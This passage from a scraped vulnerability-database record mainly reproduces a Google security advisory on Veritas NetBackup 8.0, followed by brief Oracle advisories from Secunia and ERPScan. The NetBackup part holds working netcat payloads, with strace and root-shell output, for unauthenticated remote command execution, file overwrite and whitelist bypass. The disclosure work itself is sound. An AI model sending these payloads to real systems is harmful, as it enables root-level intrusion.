1 root root 960472 Dec 6 23:19 /usr/openv/netbackup/bin/bash\r\n\r\nExecution of any command by running the now whitelisted bash interpreter:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/bash foo -c id>/tmp/moo.txt\\n\" | nc 10.128.0.5 1556\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 32549] execve(\"/usr/openv/netbackup/bin/bash\", [\"foo\", \"-c\",\r\n\"id>/tmp/moo.txt\"], [/* 19 vars */]) = 0\r\nProcess 32550 attached\r\n[pid 32550] execve(\"/bin/id\", [\"id\"], [/* 19 vars */]) = 0\r\n\r\n# cat /tmp/moo.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nEven with the added whitelist, the C_REMOTE_EXECUTE API still provides\r\naccess to over 600 (!) executable binaries. It is very likely that a number\r\nof these binaries can be leveraged to bypass the current security\r\nmechanisms and provide high risk attack vectors as shown in the example\r\nabove.\r\n\r\n\r\n\r\n----------------------------------------------------\r\n\r\nNB8-03: Unauthenticated privileged remote file write\r\n\r\n----------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe bprd process allows remote privileged write to files by sending a\r\nspecial packet leveraging the C_REMOTE_WRITE (0x71) call. The attacker has\r\nfull control over file-name and content. The path is limited by a whitelist\r\ncheck that was implemented in NetBackup 7.x. 
As the C_REMOTE_WRITE function\r\ngives an attacker full control over content and filename and also allows\r\naappendinga to existing files, this issue is rated as HIGH.\r\n\r\n\r\n\r\nExample:\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 29\r\n/usr/openv/netbackup/svbl.txt a 10 helloworld \\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n[pid 1027] open(\"/usr/openv/netbackup/svbl.txt\",\r\nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1027] write(7, \"helloworld\", 10) = 10\r\n\r\n# cat /usr/openv/netbackup/svbl.txt\r\nhelloworld\r\n\r\n\r\n\r\n# ls -l /usr/openv/netbackup/svbl.txt\r\n-rw-r--r--. 1 root root 20 Feb 3 15:55 /usr/openv/netbackup/svbl.txt\r\n\r\nEven though the allowed paths are checked against a whitelist, the API is\r\nflexible enough to provide an attacker a useful entry point for further\r\nattacks. An API that allows full control over filename and content should\r\nnot be exposed to the network without authentication.\r\n\r\n\r\n\r\n--------------------------------------------------------------------------------\r\n\r\nNB8-04: Unauthenticated privileged remote command execution via whitelist\r\nbypass\r\n\r\n--------------------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nIn NetBackup 7.x, a whitelist was added to provide a layer of security\r\nagainst arbitrary command execution via APIs provided by NetBackup.\r\nFunctionality like the C_REMOTE_WRITE API are also checked against this\r\nwhitelist. The caveat here is that this whitelisting caused problems in\r\nproduction use. 
To counter that, Veritas added a configuration option to\r\nadd custom paths to the whitelist, as documented here:\r\nhttps://www.veritas.com/support/en_US/article.000100775\r\n\r\n\r\n\r\nLeveraging the vulnerability described in NB8-03, it is possible to add any\r\npath to the whitelist, enabling an attacker to (over)write any file in the\r\nwhitelisted paths. The following attack chain shows an example that grants\r\nremote command execution.\r\n\r\n\r\n\r\nAdd a new whitelist entry to bp.conf:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 28\r\n/usr/openv/netbackup/bp.conf a 48 BPCD_WHITELIST_PATH =\r\n/usr/openv/netbackup/bin \\x0d\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 1550] open(\"/usr/openv/netbackup/bp.conf\",\r\nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1550] write(7, \"BPCD_WHITELIST_PATH = /usr/openv/netbackup/bin \\r\",\r\n48) = 48\r\n\r\nWrite to the now whitelisted /usr/openv/netbackup/bin path and overwrite a\r\nexecutable file:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 33\r\n/usr/openv/netbackup/bin/initbprd w 27 /usr/bin/id > /tmp/svbl.txt\\n\" | nc\r\n10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n[pid 1622] open(\"/usr/openv/netbackup/bin/initbprd\",\r\nO_WRONLY|O_CREAT|O_TRUNC|O_DSYNC, 0666) = 7\r\n[...]\r\n\r\n[pid 1622] write(7, \"/usr/bin/id > /tmp/svbl.txt\", 27) = 27\r\n\r\nExecute the overwritten file:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/initbprd foo\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 1687] execve(\"/bin/sh\", [\"/bin/sh\",\r\n\"/usr/openv/netbackup/bin/initbprd\"], [/* 19 vars */]) = 0\r\nProcess 1688 attached\r\n[pid 1688] open(\"/tmp/svbl.txt\", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3\r\n[pid 1688] execve(\"/usr/bin/id\", [\"/usr/bin/id\"], [/* 19 vars */]) = 0\r\n\r\n# cat 
/tmp/svbl.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nA possible mitigation for this issue might be to either completely remove\r\nthe C_REMOTE_WRITE API or at least limit it to a very small number of\r\ndirectories that have no overlap with the C_REMOTE_EXECUTE whitelist and do\r\nnot contain any sensitive files like the bp.conf.\r\n\r\n\r\n\r\n---------------------------------------------------------------\r\n\r\nNB8-05: Bypass of DNS based security model through pbx_exchange\r\n\r\n---------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nFor several API functions and service calls (e.g. bprd), NetBackup checks\r\nthe source IP of the request and matches it against a list of allowed\r\nClients. In most cases a request is only allowed from\r\n\r\n -\r\n\r\n localhost\r\n -\r\n\r\n NetBackup Server known to the local system\r\n -\r\n\r\n NetBackup Client known to the local system\r\n\r\n\r\n\r\nIt was discovered that the service pbx_exchange, listening on tcp/1556 can\r\nbe used to bypass this security check.\r\n\r\nExample:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\nfooa | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nThe above command sends the data afooa to the bprd service. 
The target\r\nservice is specified by the aextensiona parameter, everything after two new\r\nlines is forwarded to the extension service.\r\n\r\nThe previously described vulnerabilities in this report make use of this\r\nbehaviour.\r\n\r\n\r\n\r\nAs this functionality allows bypassing the source host based security model\r\nit is recommended to change the behaviour of pbx_exchange to forward the\r\noriginal source IP to the target service and modify the security checks to\r\nvalidate against that original source IP.\r\n\r\n\r\n\r\nAuthor\r\n\r\n======\r\n\r\nThe vulnerabilities were discovered by Sven Blumenstein and Xiaoran Wang\r\nfrom Google Security Team.\r\n\r\n\r\n\r\nTimeline\r\n\r\n========\r\n\r\n2017/02/06 - Security report sent to [email\u00a0protected] with 90 day\r\n disclosure deadline.\r\n\r\n2017/03/21 - Questions from Veritas on some issues were answered.\r\n\r\n2017/04/20 - Veritas announced an Advisory for customers will be published\r\non 2017/05/07 on veritas.com\r\n\r\n2017/05/07 - Advisory published by Veritas:\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n2017/05/08 - Public disclosure of this security report.\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/27741"}], "packetstorm": [{"lastseen": "2017-05-09T13:26:18", "description": "", "published": "2017-05-09T00:00:00", "type": "packetstorm", "title": "Veritas Netbackup 8.0 File Write / Remote Code Execution / Bypass", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-09T00:00:00", "id": "PACKETSTORM:142428", "href": "https://packetstormsecurity.com/files/142428/Veritas-Netbackup-8.0-File-Write-Remote-Code-Execution-Bypass.html", "sourceData": "`Veritas Netbackup 8.0 - Multiple Vulnerabilities \n \n------------------------------------------------- \n \n \n \nIntroduction \n \n============ \n \nMultiple vulnerabilities were identified in Veritas Netbackup ( 
\nhttps://www.veritas.com/product/backup-and-recovery/netbackup-8). The \nvulnerabilities were discovered during a black-box security assessment and \ntherefore the vulnerability list should not be considered exhaustive. \n \n \n \nNetBackup 8.0 was assessed by Google Security as a follow-up to a previous \nassessment of NetBackup 6.x and 7.x (see \nhttp://seclists.org/fulldisclosure/2017/Feb/101). After assessing the \nsecurity of three generations of this software, it unfortunately became \nclear that the current architecture of NetBackup has several security flaws: \n \n \n \n- The proprietary protocol used between NB Clients and Servers provides no \nauthentication or encryption. \n \n- Parameters passed to executable commands are (partially) processed \nunfiltered. \n \n- Even though a whitelisting for executable paths was added in recent \nversions of NetBackup, those paths contain over 600 (!) executables - a \nvulnerability in any of those could be leveraged to compromise a NetBackup \nsystem. \n \n- All processes related to NetBackup run as root, which increases the risk \nof compromise (this was already reported in a previous advisory). \n \n \n \nWe highly recommend putting additional layers of security around running \nNetBackup installations, for example strong firewall policies that only \nallow legitimate NetBackup systems to interact with each other over the \nnetwork. \n \n \n \nPlease see the Advisory Veritas released for more information: \n \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n \n \nVeritas also provides patches for NetBackup 8.0 that should be applied \nASAP. Those can be found at the following URL: \n \nhttps://www.veritas.com/support/en_US/article.000126389 \n \n \n \nAffected Software and Versions \n \n============================== \n \n- Veritas Netbackup 8.0 \n \n \n \nCVE \n \n=== \n \nCVEs have been assigned but are not published yet. 
Please see this Veritas \nadvisory for the CVE IDs: \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n \n \nVulnerability Overview \n \n====================== \n \n \n \n1. NB8-01: HIGH: Unauthenticated privileged remote command execution via \nbprd \n \n2. NB8-02: HIGH: Unauthenticated privileged remote command execution via \nnbbsdtar \n \n3. NB8-03: HIGH: Unauthenticated privileged remote file write \n \n4. NB8-04: HIGH: Unauthenticated privileged remote command execution via \nwhitelist bypass \n \n5. NB8-05: HIGH: Bypass of DNS based security model through pbx_exchange \n \n \n \n \n \nVulnerability Details \n \n===================== \n \n \n \n-------------------------------------------------------------------- \n \nNB8-01: Unauthenticated privileged remote command execution via bprd \n \n-------------------------------------------------------------------- \n \nSeverity: High \n \n \n \nThe bprd process allows privileged remote code execution by sending \na special packet leveraging the C_PFI_ROTATION (0x70) command. This command \nis vulnerable to command injection. This vulnerability bypasses \nthe directory whitelist implemented in NetBackup 7.x and allows privileged \nexecution of any command. 
\n \n \n \nThe following command executes \"/usr/bin/id>/tmp/meh.txt\" on the Netbackup \nserver 10.128.0.5: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 112 1 2 foo\\`id>/tmp/meh.txt\\` \nbar baz 3 meh\\n\" | nc 10.128.0.5 1556 \n \n \n \nLog file excerpt: \n \n \n \n15:27:36.467 [31611.31611] <2> get_string: 329199 112 1 2 \nfoo`id>/tmp/meh.txt` bar baz 3 meh \n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic: \n[vnet_vxss_helper.c:641] VxSS magic=329199, remote_vxss=11 \n2 \n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic: \n[vnet_vxss_helper.c:698] Ignoring VxSS authentication 2 0x \n2 \n15:27:36.467 [31611.31611] <2> process_request: command C_PFI_ROTATION \n(112) received \n15:27:36.467 [31611.31611] <2> process_request: pfi_rotation request = \n329199 112 1 2 foo`id>/tmp/meh.txt` bar baz 3 me \nh \n \nStrace excerpt: \n \n \n \n[pid 31641] execve(\"/bin/sh\", [\"sh\", \"-c\", \n\"\\\"/usr/openv/netbackup/bin/admincmd/bppficorr\\\" -rotation -policy 2 \n-client 1 -fim \\\"foo`id>/tmp/meh.txt`\\\" 2>&1\"], [/* 18 vars */]) = 0 \nProcess 31642 attached \nProcess 31643 attached \n[pid 31643] execve(\"/bin/id\", [\"id\"], [/* 18 vars */]) = 0 \n \n# cat /tmp/meh.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nThe validity of API parameters should be ensured by proper filtering of \npassed parameters. \n \n \n \n------------------------------------------------------------------------ \n \nNB8-02: Unauthenticated privileged remote command execution via nbbsdtar \n \n------------------------------------------------------------------------ \n \nSeverity: High \n \n \n \nThe binary nbbsdtar can be leveraged to copy any file to a whitelisted \ndirectory. This then allows leveraging the C_REMOTE_EXECUTE (0x46) command to \nexecute the copied file. This vulnerability bypasses the directory \nwhitelist implemented in NetBackup 7.x and allows privileged execution of \nany command. 
\n \n \n \nPacking /bin/bash into the tar file /tmp/foo.tar: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/private/nbbsdtar foo -c -f /tmp/foo.tar \n/bin/bash\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace output: \n \n \n \n[pid 32461] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\", \n\"-c\", \"-f\", \"/tmp/foo.tar\", \"/bin/bash\"], [/* 19 vars */]) = 0 \n \nUnpacking /tmp/foo.tar to the whitelisted directory \n/usr/openv/netbackup/bin (\"/bin\" can be omitted as /bin/bash was added to \nthe tar with its full path): \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/private/nbbsdtar foo -x -f /tmp/foo.tar -C \n/usr/openv/netbackup/\\n\" | nc 10.128.0.5 1556 \n \nStrace output: \n \n \n \n[pid 32486] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\", \n\"-x\", \"-f\", \"/tmp/foo.tar\", \"-C\", \"/usr/openv/netbackup/\"], [/* 19 vars \n*/]) = 0 \n \n# ls -l /usr/openv/netbackup/bin/bash \n-rwxr-xr-x. 1 root root 960472 Dec 6 23:19 /usr/openv/netbackup/bin/bash \n \nExecution of any command by running the now whitelisted bash interpreter: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/bash foo -c id>/tmp/moo.txt\\n\" | nc 10.128.0.5 1556 \n \nStrace excerpt: \n \n \n \n[pid 32549] execve(\"/usr/openv/netbackup/bin/bash\", [\"foo\", \"-c\", \n\"id>/tmp/moo.txt\"], [/* 19 vars */]) = 0 \nProcess 32550 attached \n[pid 32550] execve(\"/bin/id\", [\"id\"], [/* 19 vars */]) = 0 \n \n# cat /tmp/moo.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nEven with the added whitelist, the C_REMOTE_EXECUTE API still provides \naccess to over 600 (!) executable binaries. 
It is very likely that a number \nof these binaries can be leveraged to bypass the current security \nmechanisms and provide high-risk attack vectors as shown in the example \nabove. \n \n \n \n---------------------------------------------------- \n \nNB8-03: Unauthenticated privileged remote file write \n \n---------------------------------------------------- \n \nSeverity: High \n \n \n \nThe bprd process allows remote privileged writes to files by sending a \nspecial packet leveraging the C_REMOTE_WRITE (0x71) call. The attacker has \nfull control over filename and content. The path is limited by a whitelist \ncheck that was implemented in NetBackup 7.x. As the C_REMOTE_WRITE function \ngives an attacker full control over content and filename and also allows \n\"appending\" to existing files, this issue is rated as HIGH. \n \n \n \nExample: \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 29 \n/usr/openv/netbackup/svbl.txt a 10 helloworld \\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n[pid 1027] open(\"/usr/openv/netbackup/svbl.txt\", \nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7 \n[...] \n \n[pid 1027] write(7, \"helloworld\", 10) = 10 \n \n# cat /usr/openv/netbackup/svbl.txt \nhelloworld \n \n \n \n# ls -l /usr/openv/netbackup/svbl.txt \n-rw-r--r--. 1 root root 20 Feb 3 15:55 /usr/openv/netbackup/svbl.txt \n \nEven though the allowed paths are checked against a whitelist, the API is \nflexible enough to provide an attacker a useful entry point for further \nattacks. An API that allows full control over filename and content should \nnot be exposed to the network without authentication. 
\n \n \n \n-------------------------------------------------------------------------------- \n \nNB8-04: Unauthenticated privileged remote command execution via whitelist \nbypass \n \n-------------------------------------------------------------------------------- \n \nSeverity: High \n \n \n \nIn NetBackup 7.x, a whitelist was added to provide a layer of security \nagainst arbitrary command execution via APIs provided by NetBackup. \nFunctionality like the C_REMOTE_WRITE API is also checked against this \nwhitelist. The caveat here is that this whitelisting caused problems in \nproduction use. To counter that, Veritas added a configuration option to \nadd custom paths to the whitelist, as documented here: \nhttps://www.veritas.com/support/en_US/article.000100775 \n \n \n \nLeveraging the vulnerability described in NB8-03, it is possible to add any \npath to the whitelist, enabling an attacker to (over)write any file in the \nwhitelisted paths. The following attack chain shows an example that grants \nremote command execution. \n \n \n \nAdd a new whitelist entry to bp.conf: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 28 \n/usr/openv/netbackup/bp.conf a 48 BPCD_WHITELIST_PATH = \n/usr/openv/netbackup/bin \\x0d\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n \n \n[pid 1550] open(\"/usr/openv/netbackup/bp.conf\", \nO_WRONLY|O_CREAT|O_APPEND|O_DSYNC, 0666) = 7 \n[...] \n \n[pid 1550] write(7, \"BPCD_WHITELIST_PATH = /usr/openv/netbackup/bin \\r\", \n48) = 48 \n \nWrite to the now whitelisted /usr/openv/netbackup/bin path and overwrite an \nexecutable file: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 71 localhost root 33 \n/usr/openv/netbackup/bin/initbprd w 27 /usr/bin/id > /tmp/svbl.txt\\n\" | nc \n10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n[pid 1622] open(\"/usr/openv/netbackup/bin/initbprd\", \nO_WRONLY|O_CREAT|O_TRUNC|O_DSYNC, 0666) = 7 \n[...] 
\n \n[pid 1622] write(7, \"/usr/bin/id > /tmp/svbl.txt\", 27) = 27 \n \nExecute the overwritten file: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337 \n/usr/openv/netbackup/bin/initbprd foo\\n\" | nc 10.128.0.5 1556 \n \n \n \nStrace excerpt: \n \n \n \n[pid 1687] execve(\"/bin/sh\", [\"/bin/sh\", \n\"/usr/openv/netbackup/bin/initbprd\"], [/* 19 vars */]) = 0 \nProcess 1688 attached \n[pid 1688] open(\"/tmp/svbl.txt\", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 3 \n[pid 1688] execve(\"/usr/bin/id\", [\"/usr/bin/id\"], [/* 19 vars */]) = 0 \n \n# cat /tmp/svbl.txt \nuid=0(root) gid=0(root) groups=0(root) \ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 \n \nA possible mitigation for this issue might be to either completely remove \nthe C_REMOTE_WRITE API or at least limit it to a very small number of \ndirectories that have no overlap with the C_REMOTE_EXECUTE whitelist and do \nnot contain any sensitive files like the bp.conf. \n \n \n \n--------------------------------------------------------------- \n \nNB8-05: Bypass of DNS based security model through pbx_exchange \n \n--------------------------------------------------------------- \n \nSeverity: High \n \n \n \nFor several API functions and service calls (e.g. bprd), NetBackup checks \nthe source IP of the request and matches it against a list of allowed \nClients. In most cases a request is only allowed from \n \n- localhost \n- NetBackup Server known to the local system \n- NetBackup Client known to the local system \n \n \n \nIt was discovered that the service pbx_exchange, listening on tcp/1556, can \nbe used to bypass this security check. \n \nExample: \n \n \n \n# echo -ne \"ack=1\\nextension=bprd\\n\\nfoo\" | nc 10.128.0.5 1556 \n \n \n \nThe above command sends the data \"foo\" to the bprd service. The target \nservice is specified by the \"extension\" parameter; everything after two new \nlines is forwarded to the extension service. 
\n \nThe previously described vulnerabilities in this report make use of this \nbehaviour. \n \n \n \nAs this functionality allows bypassing the source host based security model, \nit is recommended to change the behaviour of pbx_exchange to forward the \noriginal source IP to the target service and modify the security checks to \nvalidate against that original source IP. \n \n \n \nAuthor \n \n====== \n \nThe vulnerabilities were discovered by Sven Blumenstein and Xiaoran Wang \nfrom Google Security Team. \n \n \n \nTimeline \n \n======== \n \n2017/02/06 - Security report sent to secure@veritas.com with 90-day \ndisclosure deadline. \n \n2017/03/21 - Questions from Veritas on some issues were answered. \n \n2017/04/20 - Veritas announced that an Advisory for customers would be published \non 2017/05/07 on veritas.com \n \n2017/05/07 - Advisory published by Veritas: \nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html \n \n2017/05/08 - Public disclosure of this security report. 
\n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142428/veritasnetbackup80-exec.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll 
when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable 
vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. 
ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplay the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase user enumeration\r\nVulnerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
